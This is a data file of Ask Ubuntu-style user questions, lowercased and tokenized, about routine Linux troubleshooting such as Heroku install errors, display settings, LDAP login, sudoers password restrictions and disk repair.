500921	installation of heroku returns errors with json	like the title says , i 've been trying to install heroku . however , as soon as i run any heroku commands i get this in return : /usr/local/heroku/vendor/gems/json-1.7.7/lib/json/common.rb:67 : in `initialize ' : no implicit conversion of nil into hash ( typeerror ) from /usr/local/heroku/vendor/gems/json-1.7.7/lib/json/common.rb:67 : in `new' from /usr/local/heroku/vendor/gems/json-1.7.7/lib/json/common.rb:67 : in `generator=' from /usr/local/heroku/vendor/gems/json-1.7.7/lib/json/ext.rb:17 : in ` < module : ext > ' from /usr/local/heroku/vendor/gems/json-1.7.7/lib/json/ext.rb:12 : in ` < module : json > ' from /usr/local/heroku/vendor/gems/json-1.7.7/lib/json/ext.rb:9 : in ` < top ( required ) > ' from /home/andrew/.rvm/rubies/ruby-2.1.2/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55 : in `require' from /home/andrew/.rvm/rubies/ruby-2.1.2/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55 : in `require' from /usr/local/heroku/vendor/gems/json-1.7.7/lib/json.rb:58 : in ` < module : json > ' from /usr/local/heroku/vendor/gems/json-1.7.7/lib/json.rb:54 : in ` < top ( required ) > ' from /home/andrew/.rvm/rubies/ruby-2.1.2/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55 : in `require' from /home/andrew/.rvm/rubies/ruby-2.1.2/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55 : in `require' from /usr/local/heroku/lib/heroku/cli.rb:18 : in ` < top ( required ) > ' from /home/andrew/.rvm/rubies/ruby-2.1.2/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55 : in `require' from /home/andrew/.rvm/rubies/ruby-2.1.2/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55 : in `require' from /usr/local/heroku/bin/heroku:23 : in ` < main > ' i ran these commands to install heroku : sudo apt-add-repository 'deb http : //toolbelt.herokuapp.com/ubuntu ./' wget -o- https : //toolbelt.heroku.com/apt/release.key | apt-key add - sudo apt-get update sudo apt-get install heroku-toolbelt can anyone help me out ? thanks !
500922	lubuntu 14.04 dual mon with arandr screen layout editor	i have make use of the xrandr with lubuntu 14.04 on my old vaio tz17gn notebook . it working fine for my dual monitors situation . but i found some tricky issues . desktop issue first of all , i ca n't right click to popup a context menu on my main monitor . the menu only work on the secondary monitor . after i have configure openbox manager to show home/recyclebin/removablestoragedevice icons on the desktop , the menu ( desktop right click context menu ) has been changed to another one that mass with many incorrect shortcut items . if i click on those item , the current user desktop session must crashed and return to the login screen . file manager the second issue is while i want to create/place files or folders on desktop by copying them by terminal command or file manager , those files/folders wo n't appears . at the same time , i found that the default file manager ( pcmanfc ) wo n't show up any more too . if a file manager has already opened before something moved into the desktop folder , the file manager must be freeze instantly . is it a bug ? or i should not use the arandr to belong with lubuntu 14.04 ? thanks a lot .
500923	i do n't want other administrator to change my password	i have one administrator account in my system which named as `` admin '' . one more admin account called `` test '' . i do n't want test account to reset `` admin '' account and root account password in my system . i have blocked sudo users by following command . % sudo all= ( all ) all , ! /usr/bin/passwd root , ! /usr/bin/passwd admin admin all= ( all : all ) all it 's working on when executing this command as test user . if test user tries sudo passwd root or sudo passwd admin it throws following error called sorry , user test is not allowed to execute '/usr/bin/passwd root ' as root on magesh-test . but it 's not working while executing the following command sudo passwd $ root how to block the test user alone in resetting the password ?
500926	hard disk not showing while installing ubuntu 14.04	i used multisystem to create bootable usb which contains ubuntu 14.04 ( 32 and 64 bit ) , windows 8.1 , and boot-repair . now i 'm trying to install ubuntu 14.04 , but while installing it is only showing the pendrive which contains all 3 os and boot-repair . i ca n't select any other partitions of my hard disk as shown below . /dev/sda is my hard disk . i double clicked hoping that it would expand showing other partitions but it is asking whether to install on whole 1tb disk . the actual partitions available are , and i have previously installed ubuntu 12.10 which is of size 20 gb . now i want to add another 22 gb so you can see 22 gb unallocated space which i thought of merging during the installation time . but none of them are showing.any idea what is causing this ?
500927	network manager icon is missing on ubuntu 14.04 lts	a while after i installed ubuntu 14.04 lts , the network manager icon disappeared from the panel , although the wifi is working . also the bluetooth icon disappeared too . how can i fix this issue ?
500930	how do i install network driver source code to /lib/modules/ < kernel version > /build/drivers/net/ethernet	i have installed the kernel source headers , but i need to apply patches to individual driver ( e1000e ) source . currently the directory below only consists of a makefile ls /lib/modules/3.13.0-32-generic/build/drivers/net/ethernet/intel/e1000e/ makefile is it possible to install all the *.h and *.c files from the online or dvd repo to that directory ?
500933	listing files in apache server	i have installed apache server in my system running ubuntu 14.04 . when i type localhost or my ip address in the browser , it is displaying the apache page . instead of that page , i need to list the contents ( folder/files ) in /var/www directory . how do i configure it ?
500934	no sound devices or input devices ( ubuntu 14 )	so last night i turned my laptop off to go to sleep , i then turned it on this morning only to discover i have no sound devices ( input and output ) . i tried sudo alsa force-reload and also tried reinstalling alsa and pulse audio any ideas how to fix this problem ? edit : i think the problem is that pulseaudio wont load , any ideas how to fix it , tried reinstalling it already ?
500940	do n't have permission or does n't exist	i 'm trying to configure an oculus rift and i have a configuration script that needs to be executed : glados @ deathbox : ~/desktop/oculussdk/tools/oculusconfigutil $ ./oculusconfigutil_i386 bash : ./oculusconfigutil_i386 : permission denied glados @ deathbox : ~/desktop/oculussdk/tools/oculusconfigutil $ sudo ./oculusconfigutil_i386 sudo : ./oculusconfigutil_i386 : command not found now i do n't understand why it first says i do n't have permission ( when i execute without sudo ) and then says that the command does n't exist . am i doing something wrong ?
500943	ca n't re-install after panic	i have an asus eee pc r101 that runs ubuntu 12.04 . after running the janitor that comes with tweak , my drivers were gone . l ong story short , all my attempts to recover the system failed so i went for a complete re-installation ( of 14.04 ) using a live usb thumb . installation worked fine , up to a point , then it stopped and took me to a terminal where it informed me about panic . i suppose i touched the usb thumb and it disconnected for a moment ( my hardware is pretty old ) , ca n't be sure though . now when i try to re-install , the installer gets stuck in a black screen after the splash screen ( the one with the 4 dots ) . running with nomodeset , acpi= off and quiet splash disabled gives some information . since i 'm not exactly sure what to look for and the output comes pretty fast , i 'll just focus on what struck my eyes first in this post : /sda1/ volume was not properly unmounted , please run fschk cp : no free space failed to create /tmp/.x11-unix this is probably not 100 percent accurate and as i am doing it from memory , but i guess that 's the gist of it . the whole thing then gets stuck after the following lines : sd 0:0:0:0 : [ sdb ] attached scsi disk random : like urandom read with 73 bits of entropy available bio : create slab < bio-1 > at 1 random : non blocking pool is initialized the system has been at this point all night . same thing happens when i try ubuntu without installing . does anyone have a solution or suggestion ?
500945	gnome toggle minimize/maximum on application click ?	i have gnome running and i have been looking for this feature for a while but no luck . i want to click on the main application on the top panel to toggle minimize/maximize . i 've attached a picture on which i mean . on this example , clicking on `` google chrome '' would minimize chrome .
500951	what are the best tweaked nvidia drivers for my laptop ?	i need drivers and tweaked drivers for lubuntu . details : hp pavilion dv7-1025nr nvidia geforce 9600m gt lubuntu 14.04 - 64bit intel core 2 duo p8400 @ 2.26ghz 2.27ghz 4gb ram if you need more info . ask me . thanx
500952	windows mapped folder access	i have successfully mapped a a shared folder in windows to ubuntu . but i ca n't save anything in the folder from ubuntu . i can browse and open and all but i ca n't save anything to the folder or create any files in that folder . i have given full read/write access to the folder from windows . here is my fstab entry if its help . please let me know how to get this work . //192.168.2.3/miracle /media /miracle cifs username=admin , password=password123 , iocharset=utf8 , sec=ntlm 0 0 thanks in advance for looking into this
500954	install dpkg-depcheck in 12.04	i 'm attempting to compile a deb package using 12.04 but am unable to run a dpkg-depcheck on ubuntu 12.04 . the command does n't exist on the server i 'm using and is n't a package in the repositories either . ( it is , however , on my desktop machine ) how might i install it ? thanks in advance
500957	how to use grep to search for a pattern which starts with a hyphen ( - ) ?	sudo find / -name `` * '' | xargs grep -sn -- color=auto `` -j '' above command returns below : grep : invalid option -- 'j' usage : grep [ option ] ... pattern [ file ] ... try `grep -- help ' for more information . grep : invalid option -- 'j' usage : grep [ option ] ... pattern [ file ] ... try `grep -- help ' for more information . grep : invalid option -- 'j' usage : grep [ option ] ... pattern [ file ] ... try `grep -- help ' for more information . how do i search for string -j ?
500962	14.04 unable to install correct package	i 'm attempting to configure an oculus rift for this i need to execture ./oculusconfigutil_i386 this gives me the following error : ./oculusconfigutil_i386 : error while loading shared libraries : libudev.so.0 : can not open shared object file : no such file or directory then doing sudo apt-get update sudo apt-get install libudev0 : i386 sudo apt-get install libudev0 both eturned that the packagep ( : i386 ) has no installation candidate . this worked for me , but gave me the error : ./oculusconfigutil_i386 : error while loading shared libraries : libudev.so.0 : can not open shared object file : no such file or directory when trying to run the script again . any ideas ? running : ls -l /lib/x86_64-linux-gnu | grep libudev gives this output : lrwxrwxrwx 1 root root 34 jul 22 09:56 libudev.so.0 - > /lib/x86_64-linux-gnu/libudev.so.1 lrwxrwxrwx 1 root root 16 jun 20 02:15 libudev.so.1 - > libudev.so.1.3.5 -rw-r -- r -- 1 root root 67600 jun 20 02:16 libudev.so.1.3.5
500966	shell script to run vm	i use virtualbox . instead of clicking on the button of the name of the virtual machine to run it , i want a shell script that can run a windows xp virtual machine hosted on ubuntu machine . can someone help me please ?
500972	why does `` man x-terminal-emulator '' return the output of `` man gnome-terminal '' ?	i know what x-terminal-emulator is and does , but i do n't understand why there is n't exist a special manual page for it instead to be redirected to the manual page of gnome-terminal . i would like to see a manual page explaining what x-terminal-emulator exactly does and in that page a reference to man gnome-terminal . is this correct ( if yes , then why , for example , the output of man dir does n't return the output of man ls ) ? it is there a good motivation behind this fact ?
500974	vmware tools installation problem	i just installed xubuntu on my vmware workstation . after i saw , that i ca n't change display settings ( resolution ) , i try to install vmware tools . but - after i run vmware-install.pl , i get a message : the following vmware kernel modules have been found on your system that were not installed by the vmware installer . please remove them then run this installer again . vmci execution aborted . what can i do ?
500975	get error about modprob while booting	when i want to boot my os , i got this error before booting : libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/blacklist_kinect.conf line1 : ignoring bad line starting with 'cklist' i changed the blacklist_kinect.conf and even deleted it , but i got this error again when i restarted my laplop
500977	ah00015 : unable to open logs action 'start ' failed . in ubuntu 14.04	i am trying install apache2 , i faced this problem.give me some solutions restarting web server apache2 gives the error : ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message ( 98 ) address already in use : ah00072 : make_sock : could not bind to address [ : : ] :80 ( 98 ) address already in use : ah00072 : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down ah00015 : unable to open logs action 'start ' failed . the apache error log may have more information . [ fail ] * the apache2 instance did not start within 20 seconds . please read the log files to discover problems
500979	how can i get updates to install	i 'm running ubuntu ultimate 3.4 64bit , and when i try to check for updates i get the following message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/packages.medibuntu.org_dists_precise_free_binary-amd64_packages , e : the package lists or status file could not be parsed or opened .
500980	how to install ubuntu in celkon a79 mobile	i 'm using android 2.3 version mobile . manufacture : celkon a79 . is there any possiblity to install ubuntu on my mobile ?
500981	linux external device encryption	i 've been a windows power user/administrator and professional tech for years , i just made the decision to go linux , and wow , what a difference . i need to know if there is any decently easy way to encrypt external volumes ( i.e . usb sticks , external hard drives , and memory sticks ) compatible with ubuntu 14.04 . my tech lingo under linux is severely limited .
500982	is there a way in ubuntu to setup different power plans and switch between them easily ?	im looking for the ubuntu equivalent of windows 'power plans ' . in win 7/8 i was able to set up custom plans and switch between them . it was also possible to choose what happened when my laptop was plugged in/unplugged . the screen would automatically dim when the laptop was unplugged from a power source for example . there must be an equivalent to this in ubuntu ? thanks .
500984	package dependencies can not be resolved on ubuntu 14.04	it does this everytime i try to install something from the software center . it says the same thing on every single package except the `` frogatto '' thing is different which is the softwares name . here are the details : the following packages have unmet dependencies : frogatto : depends : libboost-regex1.54.0 but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu6 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libglew1.10 ( > = 1.10.0 ) but 1.10.0-3 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.8.2-19ubuntu1 is to be installed depends : zlib1g ( > = 1:1.2.0 ) but 1:1.2.8.dfsg-1ubuntu1 is to be installed
500985	moving encrypted folders	how can i move encrypted folder ( everything ) to new disk , my hdd that has linux is about to blow , its so slow . so i bought ssd but , how can i move encrypted folders because my linux folders are encrypted . i have tried searching info but no luck , i have tried everything i know . i 'm trying to move the whole linux to different partition .
500986	xfs partiton : ca n't fix missing superblock issues	my 1.4 tb drive in my mythtv system died while i was away last week and i ca n't seem to get to a next stage in seeing what 's wrong . fdisk -l does not show the drive . sudo lsblk -o name , fstype , size , mountpoint , label shows : sdb 1.4t sdb1 1k sdb5 1.4t sudo xfs_check /dev/sdb5 gives me : xfs_check : /dev/sdb5 is invalid ( can not read first 512 bytes ) while sudo xfs_repair /dev/sdb5 phase 1 - find and verify superblock ... superblock read failed , offset 0 , size 524288 , ag 0 , rval -1 fatal error -- input/output error what 's my next step ?
500991	how to use axel download manager with proxy ?	how to use axel download manager with proxy ? ? example host : 100.100.100.100 , port:8080 , username : admin , password : admin2
500993	workspace indicator that works with more than 4 workspaces ?	i 'm using ubuntu with more than the default 4 workspaces . the workspace indicator icon in the left sidebar only shows 4 workspaces . so i ca n't see in which workspace i 'm currently are . is there a plugin or something that can show i.e . all 8 configured workspaces with the current workspace highlighted ?
500995	add custom resolution to built-in laptop screen in ubuntu 12.04 lts	my laptop is a lenovo w530 . i have just installed ubuntu 12.04 lts and after some problems , i managed to get it working at 1920 x 1080 . however , this resolution is a bit too high for me , so i would like to add another one , but there is no other option in system settings > screen display . i have tried following the instructions on the ubuntu wiki ( adding undetected resolutions section ) , but i am too much of a beginner to know what i am doing . i believe all the solutions that i have tried are for external monitors , but i would like to change my laptop 's screen resolution . i am not quite sure what i am doing wrong , could anyone throw a suggestion ? edit i have managed to get a list of resolution by following the accepted answer here . however , changing the resolution makes the screen be replicated 4 times and it unusable . what should i do now ?
500997	no command '“alias ' found	recently , ubuntu stopped detecting my android device when i plugged it in with usb , so i was looking to fix the problem . in the process , i found this thread and i followed the steps on it . only on the last step source ~/.bashrc it showed an error similar to the code below . my android device still does n't connect ( although there are ways around it like bluetooth ) , but there 's another problem . whenever i 'sudo su ' , type my password this is what i get . saurabh @ saurabh-ubuntu : ~ $ sudo su [ sudo ] password for saurabh : no command '“alias ' found , did you mean : command '0alias ' from package 'zeroinstall-injector ' ( universe ) “alias : command not found no command '“alias ' found , did you mean : command '0alias ' from package 'zeroinstall-injector ' ( universe ) “alias : command not found root @ saurabh-ubuntu : /home/saurabh # here 's a file dot.bashrc # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines in the history . see bash ( 1 ) for more options # ... or force ignoredups and ignorespace histcontrol=ignoredups : ignorespace # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . # if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then # . /etc/bash_completion # fi and here is a file named bash.bashrc # system-wide .bashrc file for interactive bash ( 1 ) shells . # to enable the settings / commands in this file for login shells as well , # this file has to be sourced in /etc/profile . # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ { debian_chroot : - } '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , overwrite the one in /etc/profile ) ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' # commented out , do n't overwrite xterm -t `` title '' -n `` icontitle '' by default . # if this is an xterm set the title to user @ host : dir # case `` $ term '' in # xterm*|rxvt* ) # prompt_command='echo -ne `` \033 ] 0 ; $ { user } @ $ { hostname } : $ { pwd } \007 '' ' # ; ; # * ) # ; ; # esac # enable bash completion in interactive shells # if ! shopt -oq posix ; then # if [ -f /usr/share/bash-completion/bash_completion ] ; then # . /usr/share/bash-completion/bash_completion # elif [ -f /etc/bash_completion ] ; then # . /etc/bash_completion # fi # fi # sudo hint if [ ! -e `` $ home/.sudo_as_admin_successful '' ] & & [ ! -e `` $ home/.hushlogin '' ] ; then case `` $ ( groups ) `` in *\ admin\ * ) if [ -x /usr/bin/sudo ] ; then cat `` . see `` man sudo_root '' for details . eof fi esac fi # if the command-not-found package is installed , use it if [ -x /usr/lib/command-not-found -o -x /usr/share/command-not-found/command-not-found ] ; then function command_not_found_handle { # check because c-n-f could 've been removed in the meantime if [ -x /usr/lib/command-not-found ] ; then /usr/lib/command-not-found -- `` $ 1 '' return $ ? elif [ -x /usr/share/command-not-found/command-not-found ] ; then /usr/share/command-not-found/command-not-found -- `` $ 1 '' return $ ? else printf `` % s : command not found\n '' `` $ 1 '' > & 2 return 127 fi } fi hope someone knows a way to fix it . thanks .
501001	how can i unistall windows7 from my dualboot pc without affecting my ubuntu 14.04 at all ?	my pc is a laptop hp compag presario c700.thank you
501008	assigning images to gtk3 theming styles ?	you can do it in gtk2 . here is my button theme in gtk2 as an example . style `` button '' xthickness = 0 ythickness = 3 engine `` pixmap '' { image { function = box detail = `` buttondefault '' recolorable = true file = `` images/button/button-default.svg '' border = { 6 , 6 , 6 , 6 } stretch = true } can you do the same with gtk3 themes ? i 've been looking all over google and no luck . if someone could show me an example , it would be much appreciated .
501011	system tray and terminal does not display even after i restart the machine	after updating my ubuntu 1404 nomally and it failed due to network problem , 'ive restarted my machine and it can not open the terminal neither the system tray..it displays a blank screen after i enter the password ... anyone help me sort it out urgently
501013	unable to login lubuntu desktop openldap	our admin is trying to install an openldap system for some network machines . i 'm listing all the steps here so that someone may point out the breaking mistake . objective setup a centralized authentication system with ubuntu server and lubuntu clients . the users should have their personal directories kept on the server and accessible on every client they login . errors after the steps below the openldap user test1 is able to login through terminal , but the desktop login keeps looping and returning . any new user 'test2 ' ( without creating folder on client machine ) created on server throws an error on client : could not chdir to home directory /home/users/test2 : no such file or director setup using a ubuntu server 13.04 and lubuntu 13.10 client server ip : 192.168.0.55 client ip : 192.168.0.100 the lubuntu clients were installed through pxe booting over the network and installation files cached through apt-cacher-ng . a preseed file provided some of the openldap details to the client ldap-auth-config ldap-auth-config/ldapns/ldap-server string ldap : //192.168.0.55 ldap-auth-config ldap-auth-config/ldapns/base-dn string dc=organization , dc=lin ldap-auth-config ldap-auth-config/ldapns/ldap_version select 3 ldap-auth-config ldap-auth-config/dbrootlogin boolean yes ldap-auth-config ldap-auth-config/dblogin boolean false ldap-auth-config ldap-auth-config/rootbinddn string cn=admin , dc=organization , dc=lin both server and clients are normal virtualbox vm 's and no fancy hardware is involved . already checked ls -lah . the output is : total 8.0k drwxr-xr-x 2 root root 4.0k jul 21 09:20 . drwxr-xr-x 3 root root 4.0k jul 21 09:20 .. server steps installed openldap on the server sudo apt-get install slapd ldap-utils and specified administrator password edited configuration file to reflect new domain sudo nano /etc/ldap/ldap.conf : base dc=organization , dc=lin uri ldap : //192.168.0.55 ran the configuration assistant sudo dpkg-reconfigure slapd ? omit server configuration - no ? dns domain name - organization.lin ? organization name - organization name ? admin password - < adminpassword > and re-enter ? back-end database - hdb ? remove database - yes ? move old database - yes ? allow ldapv2 - no tested ldap server sudo ldapsearch -x and verified the settings installed phpldapadmin sudo apt-get install phpldapadmin created symbolic link sudo ln -s /usr/share/phpldapadmin/ /var/www/phpldapadmin edited phpldap configuration sudo nano /etc/phpldapadmin/config.php and set the following $ servers- > setvalue ( 'server ' , 'name ' , 'organization ldap server ' ) ; $ servers- > setvalue ( 'server ' , 'host ' , '192.168.0.55 ' ) ; $ servers- > setvalue ( 'server ' , 'base ' , array ( 'dc=organization , dc=lin ' ) ) ; $ servers- > setvalue ( 'login ' , 'bind_id ' , 'cn=admin , dc=organization , dc=lin ' ) ; restarted the apache service 'sudo /etc/init.d/apache2 restart' opened ports 'sudo ufw allow 80 ' and 'sudo ufw allow 389' tried logging into phpldap admin http : //192.168.0.55/phpldapadmin/ login dn : cn=admin , dc=organization , dc=lin password : < adminpassword > now tested phpldapadmin created a posix group - employees created a posix account below it - test1 / password1 the home directory for the user is /home/users/test1 client steps installed sudo apt-get install libnss-ldap libpam-ldap ldap-utils ldap-auth-client nscd on client edited sudo nano /etc/ldap.conf and entered following information : base dc=organization , dc=lin uri ldap : //192.168.0.55/ ldap_version 3 rootbinddn cn=admin , dc=organization , dc=lin pam_password md5 edited sudo nano /etc/ldap.secret and entered following information : < adminpassword > secured file sudo chmod 600 /etc/ldap.secret ran `sudo auth-client-config -t nss -p lac_ldap' edited sudo nano /etc/pam.d/common-password set line 26 as password [ success=1 user_unknown=ignore default=die ] pam_ldap.so use_authtok try_first_pass created directory sudo mkdir /home/users installed nfs-common sudo apt-get install nfs-common edited sudo nano /etc/fstab and entered the following : 192.168.0.55 : /home/users/ /home/users/ nfs rsize=8192 , wsize=8192 , timeo=14 , intr references http : //www.unixmen.com/openldap-installation-configuration-ubuntu-12-1013-0413-10-debian-67-2/ http : //www.unixmen.com/configure-linux-clients-authenticate-using-openldap/ http : //www.unixmen.com/openldap-installation-configuration-ubuntu-12-1013-0413-10-debian-67/ https : //help.ubuntu.com/lts/serverguide/openldap-server.html https : //help.ubuntu.com/community/installingphpldapadmin
501014	gnome3 on xubuntu keeps forgetting my screen resolution	i installed gnome3 on xubuntu . after i install i used the display manager to set the resolution at 1024*768 . but after every reboot gnome keeps going to 800*600 . fixes i tried . i made an executable script with xrandr command to set the resolution right and added it to start up applications . well at start it seems like it tries to re-size the display but then the screen goes grey for a minute and gnome3 loads with 800*600 generated a xorg.conf file and tried editing it and no avail . added the previous script to lightdm.conf to run it but still no avail . surprisingly xfce works fine and remembers my resolutions . fyi i have no nvidia or ati graphics card . i have an integrated intel g41 chipset with the graphic card .
501017	gnu watch without erasing previous outputs	gnu watch is a very useful tool for inspecting a program output : it executes the program and shows the output full-screen every 2 seconds . sometimes , i do n't want the previous output to be erased , but rather be printed line by line with a time stamp . for that , i use bash scripts like : while true ; do echo -n `` `date` `` ; ssh ubuntu @ server -o connecttimeout=1 `` uptime '' ; sleep 1 ; done is there a watch-like tool that can run a command and display its output with a timestamp in a line without erasing previous output ?
501020	how to delete selected text in nano editor ?	how do i delete selected text in the nano editor ? i came across this issue while needing to delete the virtual host file and replace its content completely by other content . but the problem is that i ca n't select and delete the entire text at once . and if i delete it character by character , it wo n't be a computer thing .
501022	kernel panic when starting	installed ubuntu on new laptop with win8.1 installed from usb key . worked fine and could dual boot . installed updates and rebooted when instructed got following message when booting into ubuntu : kernel panic - not syncing : fatal exception in interrupt drm_kms_helper : panic occured , switching back to text console ( does not switch back and just hangs ) reinstalled ubuntu but exact same happened although new version was installed on new partitions windows 8.1 loads fine how do i fix ?
501025	how i can poweroff all the computers in lan from single computer	i have 5 desktops , all running ubuntu 14.04 64 bit . all are connecting to the internet through the lan ( using a dlink switch ) , i want to shutdown all the computers from a single computer , is it possible ? if yes how it is possible ?
501027	ubuntu 14.04 problem with usb 3.0	i 've some problem with my usb 3.0 and an external hd . both works fine because if i plug my external hd to the usb 2.0 all works ok , and if i plug a memory stick to the usb 3.0 all works ok. usb 3.0 + hd = bad usb 2.0 + hd = ok usb 3.0 + memory stick = ok usb 2.0 + memory stick = ok ... do you have some ideas ?
501030	use on-board graphics card instead of ati mobility radeon ?	i 've been given this old laptop that i am trying to see if it can get revived using the latest xubuntu 14.04 . now here 's the problem , the laptop 's gpu is pretty much destroyed and i usually get some ugly random horizontal lines all over the screen ( that 's why this laptop was taken out of use in the first place ) . i am thinking , there could be a way around this , by using the on-board graphics card ( it should have one , right ? ) instead of the ati mobility radeon that it came with and seems to be destroyed . so , what i need is to only use the on-board graphics card ! i 've googled around for this , but most said to do the `` switch '' in bios , no option there though . any ideas ? thanks in advance !
501038	disable annoying global menu shortcuts	i would like to disable alt+ [ key ] from triggering the global menu categorie on ubuntu 14.04 ( for example the alt+h combination triggers the help menu ) . i have unactivated numbers of unity features with dconf and ccsm in order to do that but it still wo n't work .
501041	ubuntu mirroring two screens	i have two monitors : one build in display and oen oculus rift . what i want to do is test my oculus rift by mirroring my screen across both devices , however both devices don ' t share any resolutions , just the 800 x 600 around 1/4 of what both their capacities are . is there a way to force the resolution of the oculus onto my screen and just cut off or blank the parts that have no info/are now outside of the screen ?
501048	why locate is faster than find ?	i was looking for a file in my source and tried both locate and find . surprisingly locate was searching in entire machine and was faster than find , which was searching only in current directory and sub directories . here are my shell commands for both : find . -name vendorsetup.sh # takes 50 seconds to search all files in curren -sub directories . locate vendorsetup.sh # takes 20 seconds to search file in whole machine . why this ?
501052	xubuntu - open whisker with super button issue	i set the super button to open whisker menu . but , for example when i press super + f it also opens . how can i fix this problem ?
501057	find mac address of all connected systems	how can i find out how many system are connected to the local network and how can i get all ip and mac address of these systems . is their any command/package to show the ip details ? can i use this command/package in our firewall ( ip corp onlinux os ) to block unauthorized systems ?
501058	disabling < ctrl > + < super > + < down > shortcut	i have recently disabled the ubuntu shortcut for ctrlsuperdown using the ubuntu keyboard - > shortcuts menu since i wanted to rebind the shortcut using the program , autokey , to be a page down . however , even after disabling the shortcut i 'm still getting strange behaviour for the binding . the binding now does two things ; it always performs page down as expected , but if the window has recently been moved then it restores it ( the old binding for the key combination ) . is there another place where this shortcuts could still be defined ( i looked in compizconfig but i could n't find anything ) ?
501060	dual boot windows stuck at logging off	recently i have installed ubuntu 14.04 on my dell inspiron n4050 laptop , windows 7 was already installed . for some days , when i tried to open windows 7 it was stuck at logging off and now in the boot menu , i can see windows 7 and ubuntu . but i can start only ubuntu but not windows 7 . how can i start or delete windows7 ?
501065	mounting the windows drives and external usb drives	i am new to ubuntu 14.04 . i installed ubuntu on a windows laptop as the second os . as i am new user , i created two mounting points in /mnt/.. and /media.. i tried to remove one , but i could n't , it 's confusing me while working . how can i remove both mounting points and how to create new mounting points for external usb and windows drives ? my hard disk has three windows partitions ( c , d , e ) . on e , i took only some space of the available 100gb to install ubuntu .
501067	error in bcache	i used bcache to cache my 24gb ssd using this tutorial . i tried to back up my hdd with : sudo make-bcache -b /dev/sdb1 but i get this error : ca n't open dev /dev/sdb1 : device or resource busy my file system looks like this : filesystem size used avail use % mounted on /dev/sdb1 423g 79g 323g 20 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 788m 1.4m 787m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 916k 3.9g 1 % /run/shm none 100m 12k 100m 1 % /run/user lsblk looks like this : name maj : min rm size ro type mountpoint sda 8:0 0 22.4g 0 disk └─sda1 8:1 0 22.4g 0 part sdb 8:16 0 931.5g 0 disk ├─sdb1 8:17 0 429.5g 0 part / ├─sdb2 8:18 0 1k 0 part └─sdb5 8:21 0 7.7g 0 part [ swap ] sr0 11:0 1 1024m 0 rom is there anything wrong with my setup that might explain the error ?
